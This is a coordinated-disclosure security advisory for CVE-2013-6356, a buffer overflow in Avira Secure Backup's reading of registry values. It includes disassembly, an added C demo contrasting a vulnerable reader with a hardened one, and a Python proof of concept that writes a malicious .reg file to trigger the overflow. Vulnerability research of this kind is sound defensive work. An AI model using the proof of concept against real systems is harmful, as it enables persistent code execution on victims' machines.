"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow"

Author: Julien Ahrens
Platform: windows
Release date: 2013-11-18

RCE Security Advisory
http://www.rcesecurity.com
 
 
1. ADVISORY INFORMATION
-----------------------
Product:        Avira Secure Backup
Vendor URL:     www.avira.com
Type:           Improper Restriction of Operations within the Bounds of a Memory Buffer [CWE-119]
Date found:     2013-10-30
Date published: 2013-11-16
CVSSv2 Score:   4.4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE:            CVE-2013-6356
 
 
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
 
 
3. VERSIONS AFFECTED
--------------------
Avira Secure Backup v1.0.0.1 Build 3616
 
 
4. VULNERABILITY DESCRIPTION
----------------------------
A buffer overflow vulnerability has been identified in Avira Secure
Backup v1.0.0.1 Build 3616.
 
On startup the application reads the registry values
"AutoUpdateDownloadFilename" and "AutoUpdateProgressFilename" from the key
"HKEY_CURRENT_USER\Software\Avira Secure Backup", but does not validate the
length of the fetched data before using it further in the application. This
leads to a buffer overflow condition with possible persistent code
execution.
 
The application queries each value with a RegQueryValueExW call that passes
a fixed buffer (lpData) and a fixed buffer size (lpcbData; 0x820 bytes in
the disassembly below). If the stored value is larger than that size,
RegQueryValueExW copies nothing, returns ERROR_MORE_DATA and writes the
required size back into lpcbData. The application then issues a second
RegQueryValueExW call with that new, larger size, but reuses the original
buffer pointer (lpData), which has not been resized. The second call
therefore overwrites memory beyond the buffer, including SEH records.
 
An attacker needs to make the victim import an arbitrary .reg file in order
to exploit the vulnerability. Successful exploitation allows attackers to
execute arbitrary code with the privileges of the user running the
application; failed attempts result in a denial-of-service condition. The
attack is persistent, because the code is executed on every start of the
application for as long as the manipulated values remain in the registry.
 
 
5. DEBUG INFORMATION
--------------------
Call stack of main thread
Address    Returns to   Procedure / arguments       Called from
0012EB48   77DA6F87     <JMP.&ntdll.memmove>        ADVAPI32.77DA6F82
0012EB4C   0012ECBC       dest = 0012ECBC
0012EB50   0015760C       src = 0015760C
0012EB54   00002712       n = 2712 (10002.)
0012EC28   77DA708B     ADVAPI32.77DA6E02           ADVAPI32.77DA7086
0012EC60   0043F15D     Includes ADVAPI32.77DA708B  Avira_Se.0043F15B
0012EC9C   0043F3F8     Avira_Se.0043F0D2           Avira_Se.0043F3F3
0012F5B4   00CC00CC     *** CORRUPT ENTRY ***

The memmove in the top frame copies n = 0x2712 (10002) bytes into a
destination the application sized at 0x820 (2080) bytes (see the MOV at
0043F0F6 below). The corrupt entry 00CC00CC is two UTF-16LE characters
U+00CC, which is what a 0xCC filler becomes after import from an ANSI .reg
file on a Western code page.
 
The vulnerable code part of Avira Secure Backup.exe: 
0043F0D2  PUSH EBP
0043F0D3  MOV EBP,ESP
0043F0D5  SUB ESP,10
0043F0D8  PUSH EBX
0043F0D9  PUSH ESI
0043F0DA  MOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpen>; ADVAPI32.RegOpenKeyExW
0043F0E0  PUSH EDI
0043F0E1  LEA EAX,DWORD PTR SS:[EBP-8]
0043F0E4  PUSH EAX                                 ; /pHandle
0043F0E5  PUSH 20019                               ; |Access
0043F0EA  XOR EBX,EBX                              ; |
0043F0EC  PUSH EBX                                 ; |Reserved => 0
0043F0ED  PUSH DWORD PTR SS:[EBP+C]                ; |Subkey
0043F0F0  MOV BYTE PTR SS:[EBP-1],BL               ; |
0043F0F3  PUSH DWORD PTR SS:[EBP+8]                ; |hKey
0043F0F6  MOV DWORD PTR SS:[EBP-C],820             ; |
0043F0FD  CALL ESI                                 ; \RegOpenKeyExW
0043F0FF  MOV EDI,DWORD PTR DS:[<&ADVAPI32.RegQuer>; ADVAPI32.RegQueryValueExW
0043F105  TEST EAX,EAX
0043F107  JNZ SHORT Avira_Se.0043F133
0043F109  LEA EAX,DWORD PTR SS:[EBP-C]
0043F10C  PUSH EAX                                 ; /pBufSize
0043F10D  PUSH DWORD PTR SS:[EBP+14]               ; |Buffer
0043F110  LEA EAX,DWORD PTR SS:[EBP-10]            ; |
0043F113  PUSH EAX                                 ; |pValueType
0043F114  PUSH EBX                                 ; |Reserved => NULL
0043F115  PUSH DWORD PTR SS:[EBP+10]               ; |ValueName
0043F118  PUSH DWORD PTR SS:[EBP-8]                ; |hKey
0043F11B  CALL EDI                                 ; \RegQueryValueExW
0043F11D  TEST EAX,EAX 
0043F11F  JNZ SHORT Avira_Se.0043F125
0043F121  MOV BYTE PTR SS:[EBP-1],1
0043F125  PUSH DWORD PTR SS:[EBP-8]                ; /hKey
0043F128  CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
0043F12E  CMP BYTE PTR SS:[EBP-1],BL
0043F131  JNZ SHORT Avira_Se.0043F16E
0043F133  LEA EAX,DWORD PTR SS:[EBP-8]
0043F136  PUSH EAX
0043F137  PUSH 20119
0043F13C  PUSH EBX
0043F13D  PUSH DWORD PTR SS:[EBP+C]
0043F140  PUSH DWORD PTR SS:[EBP+8]
0043F143  CALL ESI 
0043F145  TEST EAX,EAX
0043F147  JNZ SHORT Avira_Se.0043F16E
0043F149  LEA EAX,DWORD PTR SS:[EBP-C]
0043F14C  PUSH EAX
0043F14D  PUSH DWORD PTR SS:[EBP+14]
0043F150  LEA EAX,DWORD PTR SS:[EBP-10]
0043F153  PUSH EAX
0043F154  PUSH EBX
0043F155  PUSH DWORD PTR SS:[EBP+10]
0043F158  PUSH DWORD PTR SS:[EBP-8]
0043F15B  CALL EDI 
0043F15D  TEST EAX,EAX
0043F15F  JNZ SHORT Avira_Se.0043F165
0043F161  MOV BYTE PTR SS:[EBP-1],1
0043F165  PUSH DWORD PTR SS:[EBP-8]                ; /hKey
0043F168  CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
0043F16E  XOR EAX,EAX
0043F170  CMP BYTE PTR SS:[EBP-1],BL
0043F173  POP EDI
0043F174  POP ESI
0043F175  SETNE AL
0043F178  POP EBX
0043F179  LEAVE
0043F17A  RETN
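The retry pattern described in sections 4 and 5, as an added example that is not code from the advisory or from Avira: a mock that implements only the documented RegQueryValueExW size contract (lpcbData is the buffer size on entry and the value size on return, ERROR_MORE_DATA when the buffer is too small), the vulnerable two-call reader with the 0x820-byte fixed destination from the listing, and a hardened reader next to it. The fake registry, the sample values, the 0x400-byte slack region and the 0x820-byte acceptance limit are constructed for the demonstration and are assumptions, not facts about the product.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* RegQueryValueExW return codes (winerror.h values). */
#define ERROR_SUCCESS        0L
#define ERROR_FILE_NOT_FOUND 2L
#define ERROR_MORE_DATA      234L

#define FIXED_BUF 0x820u  /* cbData the binary stores at [EBP-C] before its first call */
#define SLACK     0x400u  /* room behind the buffer so the demo stays inside its own array */
#define MAX_VALUE 0x820u  /* assumed upper bound a file-name consumer is willing to accept */

/* Constructed stand-in for a registry key: value name -> raw REG_SZ bytes. */
struct fake_value { const char *name; const uint8_t *data; uint32_t size; };

/* Mock of the RegQueryValueExW size contract: *lpcbData is the buffer size on
 * entry and the value size on return, whether or not anything was copied; a
 * too-small or NULL buffer copies nothing and returns ERROR_MORE_DATA. */
static long fake_RegQueryValueEx(const struct fake_value *vals, size_t nvals,
                                 const char *name, uint8_t *lpData, uint32_t *lpcbData)
{
    for (size_t i = 0; i < nvals; i++) {
        if (strcmp(vals[i].name, name) != 0)
            continue;
        uint32_t room = *lpcbData;
        *lpcbData = vals[i].size;              /* required size, reported either way */
        if (lpData == NULL || vals[i].size > room)
            return ERROR_MORE_DATA;
        memmove(lpData, vals[i].data, vals[i].size);
        return ERROR_SUCCESS;
    }
    return ERROR_FILE_NOT_FOUND;
}

/* The pattern at Avira_Se.0043F0D2: on failure, query again with the updated
 * size but the same FIXED_BUF-byte destination. Returns how many bytes were
 * written past that buffer (in the real process: saved registers, return
 * address, SEH records). Samples must fit in FIXED_BUF + SLACK so the demo
 * itself stays defined; the real binary has no such bound. */
static size_t vulnerable_read(const struct fake_value *vals, size_t nvals, const char *name)
{
    uint8_t frame[FIXED_BUF + SLACK];
    memset(frame, 0xAA, sizeof frame);         /* 0xAA marks untouched bytes */
    uint32_t cbData = FIXED_BUF;

    if (fake_RegQueryValueEx(vals, nvals, name, frame, &cbData) != ERROR_SUCCESS)
        /* BUG: cbData is now the value length, but frame was never grown. */
        fake_RegQueryValueEx(vals, nvals, name, frame, &cbData);

    size_t spilled = 0;
    for (size_t i = FIXED_BUF; i < sizeof frame; i++)
        spilled += (frame[i] != 0xAA);
    return spilled;
}

/* Hardened reader: probe the size, reject what the consumer cannot use,
 * allocate exactly that, and fail if the size changes between the calls.
 * Returns a heap copy with a UTF-16 terminator appended, or NULL. */
static uint8_t *safe_read(const struct fake_value *vals, size_t nvals,
                          const char *name, uint32_t *out_size)
{
    uint32_t cbData = 0;
    long rc = fake_RegQueryValueEx(vals, nvals, name, NULL, &cbData);
    if ((rc != ERROR_SUCCESS && rc != ERROR_MORE_DATA) || cbData == 0 || cbData > MAX_VALUE)
        return NULL;                           /* missing or oversized: never copied */

    uint32_t capacity = cbData;
    uint8_t *buf = calloc(capacity + 2, 1);
    if (buf == NULL)
        return NULL;
    if (fake_RegQueryValueEx(vals, nvals, name, buf, &cbData) != ERROR_SUCCESS
        || cbData > capacity) {
        free(buf);                             /* value changed between the two calls */
        return NULL;
    }
    if (out_size)
        *out_size = cbData;
    return buf;
}

/* Constructed samples: the 1240-character string the PoC in section 6 plants
 * ("\xCC" imported as U+00CC: 2480 UTF-16LE bytes + terminator) and a benign
 * short file name. */
static uint8_t oversized[1240 * 2 + 2];
static const uint8_t benign[] = { 'u',0,'p',0,'d',0,'.',0,'t',0,'m',0,'p',0,0,0 };

static const struct fake_value *sample_key(size_t *nvals)
{
    static struct fake_value vals[2];
    for (size_t i = 0; i < 1240; i++)
        oversized[2 * i] = 0xCC;               /* odd bytes stay 0x00 */
    vals[0] = (struct fake_value){ "AutoUpdateProgressFilename", oversized, sizeof oversized };
    vals[1] = (struct fake_value){ "AutoUpdateDownloadFilename", benign, sizeof benign };
    *nvals = 2;
    return vals;
}

/* Bytes the vulnerable reader spills past its buffer for a value name. */
size_t demo_overflow(const char *name)
{
    size_t n;
    const struct fake_value *key = sample_key(&n);
    return vulnerable_read(key, n, name);
}

/* Size the hardened reader returns for a value; 0 if it refused the value. */
uint32_t demo_hardened(const char *name)
{
    size_t n;
    const struct fake_value *key = sample_key(&n);
    uint32_t size = 0;
    uint8_t *v = safe_read(key, n, name, &size);
    uint32_t got = v ? size : 0;
    free(v);
    return got;
}

int main(void)
{
    printf("vulnerable reader spilled %zu bytes past its %u-byte buffer\n",
           demo_overflow("AutoUpdateProgressFilename"), (unsigned)FIXED_BUF);
    printf("hardened reader: oversized -> %u bytes, benign -> %u bytes\n",
           demo_hardened("AutoUpdateProgressFilename"), demo_hardened("AutoUpdateDownloadFilename"));
    return 0;
}
```

With the 2482-byte sample the vulnerable reader writes 402 bytes past the 0x820-byte buffer, which is exactly the retry the listing performs between 0043F149 and 0043F15B. The hardened reader never lets the size reported by the first call drive a copy into a buffer that was sized before that call, and it additionally refuses values longer than a file-name consumer can use, so an attacker-controlled registry value cannot grow the copy at all.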
 
 
6. PROOF-OF-CONCEPT (CODE / EXPLOIT)
------------------------------------
Use the following code to create the malicious .reg file; importing it into
the registry (for example with regedit) and starting the application
triggers the vulnerability:
 
#!/usr/bin/env python
# Builds poc.reg. Import it (e.g. regedit /s poc.reg) and start Avira Secure
# Backup: the oversized value is copied over the 0x820-byte buffer shown in
# section 5.
import sys

filename = "poc.reg"

# 1240 x 0xCC; imported from an ANSI .reg file on a Western code page each
# byte becomes the wide character U+00CC, i.e. 2480 bytes plus terminator.
junk1 = b"\xCC" * 1240

poc = b"Windows Registry Editor Version 5.00\r\n\r\n"
poc += b"[HKEY_CURRENT_USER\\Software\\Avira Secure Backup]\r\n"
poc += b"\"AutoUpdateProgressFilename\"=\"" + junk1 + b"\"\r\n"

try:
    print("[*] Creating exploit file...")
    with open(filename, "wb") as f:   # binary mode keeps the raw 0xCC bytes
        f.write(poc)
    print("[*] File successfully created!")
except IOError as e:
    print("[!] Error while creating file: %s" % e)
    sys.exit(1)
 
 
7. SOLUTION
-----------
Update to v1.0.0.2 Build 3630 or later
 
 
8. REPORT TIMELINE
------------------
2013-10-30: Discovery of the vulnerability
2013-11-03: RCE Security sends first notification to vendor via mail 
            with disclosure date set to 18. November 2013
2013-11-03: MITRE assigns CVE-2013-6356 for this issue
2013-11-04: Vendor ACKs the vulnerability
2013-11-10: RCE Security asks for a status
2013-11-11: Vendor expects to receive a fix the same day
2013-11-13: Vendor releases v1.0.0.2 Build 3630 which fixes CVE-2013-6356
2013-11-16: Coordinated Disclosure
 
 
9. REFERENCES
-------------
http://www.rcesecurity.com/2013/11/cve-2013-6356-avira-secure-backup-v1-0-0-1-buffer-overflow-anatomy-of-a-vulnerability/